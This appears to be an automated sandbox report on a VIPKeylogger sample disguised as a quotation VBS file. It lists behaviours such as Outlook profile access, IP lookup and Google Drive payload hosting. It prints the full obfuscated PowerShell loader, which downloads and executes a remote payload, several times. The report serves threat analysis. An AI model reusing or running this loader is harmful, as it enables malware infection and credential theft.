Malware Analysis Report

2024-11-30 14:57

Sample ID 241104-gc8zysxphj
Target 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
SHA256 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c
Tags
execution vipkeylogger collection discovery keylogger stealer
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c

Threat Level: Known bad

The file 0bdcef1bfa0aaab36d678b6615963b6a1f536cfb2216c6d76186476375c05e8c was found to be: Known bad.

Malicious Activity Summary

execution vipkeylogger collection discovery keylogger stealer

Vipkeylogger family

VIPKeylogger

Blocklisted process makes network request

Checks computer location settings

Looks up external IP address via web service

Accesses Microsoft Outlook profiles

Command and Scripting Interpreter: PowerShell

Legitimate hosting services abused for malware hosting/C2

Suspicious use of NtSetInformationThreadHideFromDebugger

Suspicious use of NtCreateThreadExHideFromDebugger

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Browser Information Discovery

Suspicious behavior: EnumeratesProcesses

outlook_office_path

outlook_win_path

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: MapViewOfSection

Suspicious use of WriteProcessMemory

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-04 05:40

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-11-04 05:40

Reported

2024-11-04 05:43

Platform

win7-20241010-en

Max time kernel

150s

Max time network

19s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

Signatures

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WScript.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

Network

Files

C:\Users\Admin\AppData\Local\Temp\Cab255E.tmp

MD5 49aebf8cbd62d92ac215b2923fb1b9f5
SHA1 1723be06719828dda65ad804298d0431f6aff976
SHA256 b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f
SHA512 bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

memory/2896-20-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

memory/2896-21-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-22-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-23-0x000000001B360000-0x000000001B642000-memory.dmp

memory/2896-24-0x00000000024E0000-0x00000000024E8000-memory.dmp

memory/2896-25-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-26-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-27-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-28-0x000007FEF68AE000-0x000007FEF68AF000-memory.dmp

memory/2896-29-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-30-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-31-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

memory/2896-32-0x000007FEF65F0000-0x000007FEF6F8D000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2024-11-04 05:40

Reported

2024-11-04 05:43

Platform

win10v2004-20241007-en

Max time kernel

147s

Max time network

149s

Command Line

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

Signatures

VIPKeylogger

stealer keylogger vipkeylogger

Vipkeylogger family

vipkeylogger

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Windows\System32\WScript.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A
N/A drive.google.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A checkip.dyndns.org N/A N/A

Suspicious use of NtCreateThreadExHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\SysWOW64\msiexec.exe N/A

Browser Information Discovery

discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\msiexec.exe N/A

Suspicious behavior: MapViewOfSection

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\SysWOW64\msiexec.exe N/A

outlook_office_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

outlook_win_path

Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 C:\Windows\SysWOW64\msiexec.exe N/A

Processes

C:\Windows\System32\WScript.exe

"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Request for Quotation_MYMRT.vbs"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 KrobFDrmmeitopfoselain2F,rgim ssasc Curp5GenneDRentehMar pl SkrilfacunXunwa wKalunQ ToroKTypo,s scorURes,wYEcb,ltOmplaP LivsY ,istbHydroq TeksnRgerlEgooro_.rkitn Beg,2 ServxHypohXEj ct9 ,estPApote ';$Adead=Unclogs 'Sweaz>Abrup ';$Popsanger=Unclogs 'YdelsIPolypESkiffXRclam ';$Bregnerdderne238='Prveballons229';$Riverwise='\precompelling.Wit';Stormagtskonflikten (Unclogs 'Zooli$ TestG Irr.L.ntieo tupebNi,roA brndLCerio:FryseuLaa.tNI dbia FlyvtP osetKommuEAer fnArchau HaplALinjeT VulgeJ,rdldObtru=Hacie$ProbleApathNTre lVSeign:CreneAThixlPUdsulPAppendRetn AHirplTImpasADovek+T ven$ScoutRAspa i.ninnVScenaeSoelvrpagenw nsuiIMooras HeltEDecar ');Stormagtskonflikten (Unclogs ' G wd$ Yoemg Sab l lokpoBit ebDatarADhalsLMulti:NondeADosisfSpillbCondyaalfedRHeltakFriseEEriabDO.ontEBroho=Sikk $End.cBIlliqA DbesL icrolRetsiEMaal.tSqua dMilieaSam en fnyssAnlacEDimwirPara.EunshrN Nabo.Dec mSAntipPAlkohlSkabaIInarcTAut n( Diss$ThromAHeapeDWanteeS.rabaRectod A ar)Fngse ');Stormagtskonflikten (Unclogs $Kalaset);$Balletdanseren=$Afbarkede[0];$Pseudoprophetic=(Unclogs 'Coeva$SydligStraiLLanciO BlambankarAun.erl Ruf.:Sa ttf.aemorOrigiAAr,anTMilzbR OuttILaypecChe oE Blo,l .linlNskedIFir b= MatzNMa ieEBerbeWForud-En ocoRefraBNewtsJin.elEPinloCSekstT N.ns Sel rsSnarey Melos ShibtEliz eRedesMTaple.CrystNAlte eStag TDisso.LobelWTrje.eVaarebKanticArbejlGyngeiLighte rub.n Pr.ftGru d ');Stormagtskonflikten ($Pseudoprophetic);Stormagtskonflikten (Unclogs 'Bagfl$SnkelFKaukarEpidiaSpalat ynkrMimediTartrcIllureAsi.hlFaultlRese iForkt.AmoraH .ndieAbsina LestdBiaseeFaderr .edisI.dgr[Hegni$BoolsS.nletk AfproBillelSkylleNominmIntranDrueadBugvgsUmb s]Caskt=Fonot$MnstrDPiet oVandrmOrkese f,rss Sodet rippiUncomcPotfue varsrWardriSelvfnG ynhg Garve des rStraan nadjeOpmars esin ');$Kraplak=Unclogs 'Indkr$GjedoF.ismurThoraaSerfdtSessirForboiIndtac nedbePlo tlV derlCoanniStuvn.Fngs,DSaluboGe erwdisfanOpverlRipenoslee a MicrdAp erFZ.gonireboilFo eseBelre(udsa $ DelvBrefleaPurublKonfolFremgePrambtHorisdGrunda nhann Ma.tsRhymieFornyr.ortreTortunNeu o,Stem,$bankeM Usaai Tr,akNonocr Bundoconvuf proliFove lH.moem HereesarcenSka.psUnamu)advis ';$Mikrofilmens=$Unattenuated;Stormagtskonflikten (Unclogs 'Nierf$spiraGspayrlSluknOMul tB SnorADagsal Angu: ProtSAd okvIndusIUtopiNBit ee egnesUn.tiT ichIRappoereconRPol g=kon e(DensaTAdduceBahanSKlkniTSprog-TjrehP tora.lueftEndeghAntip ,oret$CoracMst vaiPostmKv ldlRImpeto GideF ,erriPersoLOprrsm CresEIn,ekNen lesCourt) tild ');while (!$Svinestier) {Stormagtskonflikten (Unclogs 'Ursic$ GammgFiftyl Re do elfabNonnoaGermal Pros:Ma.kiRkonsteS lsogHalvfoRenrirUsknngImpe e iewpdUnder=Rudol$KalmytlystfrBorogubere.eMac o ') ;Stormagtskonflikten $Kraplak;Stormagtskonflikten (Unclogs 'FreonS arnsTCzechaEuropROutfiTForep-Grundshok.dLDenitEAblooeMaccaP Ex a ,usin4humin ');Stormagtskonflikten (Unclogs 'Micro$automgSodaklIn,tiO PostBBulltASt knlForso: S.orSA,thoVKilobiSalpeN pfolEOft nSMicr T ekski DomseN,kesrMyxop= Sti (H antTHa meEJa ovs Peept Coff- .ntipSpgelARe naTBr chHOr,de ytho$TygniM S.eei eripKMadeiRpreglo HypeF WatcI Neb LFogedMOrnamEgtternIg,ngsAstig)Debou ') ;Stormagtskonflikten (Unclogs ' Do n$A poiGRu inLBoendOSlskiB Stemasl sklDybs :MajesfForrauSikk LRoll dAgatibDe roEOecisfGysenA A,boR Bl gE ContN LettTHirsc=B yba$ nglugP ytylFord OWrathBTypolA ProslWooll:De asNA.svioBlennn.pholIAnmelNLystpTMollieS imiRRepinpOverloDeducl AnanAKbestt B.adiQuartO AiglNYdels+ arpa+Forfl% Basi$Un laASpn ifJordfBNephraSkattRsporskdoorhEArterDAli ne Octi. GenrCMutatOOmf ruSulevnBotrytK.mme ') ;$Balletdanseren=$Afbarkede[$Fuldbefarent];}$Peroxyl=312718;$Ruskendes254=32260;Stormagtskonflikten (Unclogs ' Cent$BourdgD nnilHundeOFribbbCombiA MiniLEcorc:Ar,hrC HowieLimstn ofretA.staR HedganymphlAnon,B E,vaif lmbB nstilSubliI upploReg ltLea.lE Hebek ThanEE,ecttStykesFolli Komm= Aftr ComptGVu cae TripT bayo-Nse ocretraoBagbun isketUndereBehovnSemifTDisti Ensi$Glas.MUklarISlutsKForanrAstr,OTr prf enhoiMorsiLArkivmPrizeeFootsn SurisKonto ');Stormagtskonflikten (Unclogs 'Stats$FinangCheirl Me co Fredb,arabaDyrkel C lh: A,idENervsf FlavfMiliteBrnehk Obclt Trsku FugleDenimr SpliiKakaonS ibsgKompaeC rrur Over Toil= Krem Ops e[ C anSOffenyAfruns,eignt PiraeAtlasm Raa . isquCGodkeoVejrmn enervUncites,ruerColont ,iks]Troub:Zoili:BichrFMononrSterso M slmuntunBEscheaBrug.sTypoge nva6Fyrre4Lsr.vSsh,pstPlantrCentii Ank n.kramgFordr(sepia$NisnaCDiadeeNummenKickotRecovrWou daSq irltastebCu geiKlippbreincl lamiPohapoFuturt T igeKisbokDeareeVer etLoesssSpott)Limit ');Stormagtskonflikten (Unclogs ' Drmm$GstelG,emogLformtO On.dbAllocaInko lUnder:Zar.bF AartoDithir EskaKBew tANyquiManl sr Sel EN.tli Hudor=Genda Spild[O.dstSsjlssySubliSAttertRegieE Ka sMTrisi. Tarwt.bscaeAdatjX MeriTChrem.MajusE livenPakkeC OpleO B ngdSelvhIN rmaNBar egIm.ib]Annui:Klaus:ChairajerimSSmergcHyperiSgnedIUdbaa. KdkrG BreveReinttant pSMatemT ksperPlagiISem nNV gnrGAirst( rebo$ ZapoEBe aafMa daFStemnEDis gkTilriT tudiU LulleSkaltrDomm.i,ommenGodviGF emve YndeR Un c)F,sto ');Stormagtskonflikten (Unclogs 'Sats $HavagG nmanlSpit,op ilaB TilsAMeasolAnati:,lommTGen ea OggaR,orilA olignBredstJagtrIInsi SlimnotZo,el=For a$StlndFCit ooTrep,RSociakObseraHjre,mKla lRRetroE,arke.Fejltssailou traBhjdedSNett TF,rderge,ati DecanDiskegTjr e(Velou$.unctpSemi E KaolrMockfOPrewexMinigY JungLReimb,Unsta$ hylarPo ssUChainSUnchrkbl,kdeDiagnNExactdCa.loeScunnS Read2Ind.s5Imper4Re ni)C,rat ');Stormagtskonflikten $Tarantist;"

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" " <#Overjealously Henblikkets Prearrangement Tidmangelen #>;$kookeree='Desensitize';<#Umisforstaaeligheds Kludged Edingtonite Funktionskort #>; function Unclogs($Ruskregne){If ($host.DebuggerEnabled) {$Approximatenfold++;}$voice=$Flittiglisernes+$Ruskregne.'Length' - $Approximatenfold; for ( $Approximate=5;$Approximate -lt $voice;$Approximate+=6){$Benedicerendes=$Approximate;$Hittite44+=$Ruskregne[$Approximate];}$Hittite44;}function Stormagtskonflikten($Bolstederne){ .($Popsanger) ($Bolstederne);}$Domesticeringernes=Unclogs ' ,dskMFatheoSpritzResoriHalfwlStavelAnem aMult./S rud ';$Gttevrkets=Unclogs 'U sagTKeratlDoce scale 1Rntge2hilbo ';$Kalaset='O,cip[MelleNSpidsEjellyt Cont. Lgstsarb,jE V inrDubitVPhil,IBacchcF turET matPTestaoEpiphiSch,dNBostyTwhipsMsteapACephanPoseraDulc GVarifePsychrCheva]no el:outsm: MdeasKasseeBetr.cRed.cuCapitr EneriMik,oTEkspoYSvovlPTemper SansoSu.faT Kne OEsc iC H deo scutlDecim=,elon$Blythg NatstS verTOmkrsEBiosyvBac frno arkPurliEOph,lTledelsBookn ';$Domesticeringernes+=Unclogs 'Grade5Subma. Divi0Frdig Slidd(For,eWForfliC.urnnPartidArgumoUdkrewRu,insBasia NeddmN.hickTfluid kramm1Overf0Philo. Frai0Stude;Hauss .ikarW tymi ChrinRaadv6Eunuc4Bulim; cod. HypopxFinan6Overm4Sort.; Besh G.thrLactevArkit:T.ipo1Longi3 Obs,1Nonva.Stalw0 Proc) Le n NonprGHistoe Di pcBrandkCrescoSubat/Pol r2 Thre0Sixer1Firef0Hepto0For.k1 b il0Jaghi1Bibli GwineFTyvstiUntu.r ContePelobf I teoSavlexPeddi/ awn1Dukke3 Befr1Morti.S ing0Azotu ';$Skolemnds=Unclogs 'M crouPrio SGytasEFo ieRPro i-UforgaDcth GGaardE Eft,nAfghaTPosse ';$Balletdanseren=Unclogs 'Rrfl h ,ivitM.noctIndbapLan is,onis:purve/Idiod/Unde,d HvesrElektidiss v ResteTr,gl. Su cgUnaddoInt.roregulg KalilCityte Tame.Fis,ecEraseoakrosm B,dr/ bankuQuatecExurb? romaeMun,mx FolkpOutjuoIronhrBarogtAjo.r=Freied AwayoStartwDupernOntogl StraoOpsiga Sancd Rise& Pha.i Mor d sra=Fulds1 